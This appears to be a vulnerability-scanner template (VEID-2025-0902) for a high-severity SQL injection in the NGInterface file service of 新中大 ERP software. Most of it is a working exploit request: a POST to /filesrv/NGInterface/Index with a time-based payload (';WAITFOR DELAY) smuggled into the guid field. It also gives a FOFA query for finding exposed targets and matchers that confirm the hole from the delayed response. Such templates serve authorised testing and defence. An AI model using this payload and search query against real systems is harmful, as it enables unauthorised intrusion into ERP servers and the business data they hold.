## id: VEID-2025-0902
## name: 新中大ERP企业管理软件 NGInterface 存在SQL注入
## author: hack007x
## severity: high
## tags: veid,sql,veid2025
## fofa-query: body="Resource/pic/product_btn.png" || body="/login/SSOValidation.html"
## verification: true


POST /filesrv/NGInterface/Index HTTP/1.1
Host: {{Hostname}}
User-Agent: {{random_ua}}
Content-Type: application/x-www-form-urlencoded

type=getfilelist&guid=';WAITFOR+DELAY+'0:0:5'--

#@ timeout: 20
#@ condition: and
#@ matcher: status_code == 200
#@ matcher: response_time >= 5
#@ matcher: header["Content-Type"] contains "plain" 
#@ matcher: body contains "[]"





# @VEIL-STAMP: ea2bb6d67cc63dfadee27f56237f6245fc38888131c3c0751c6705c170fd8d46
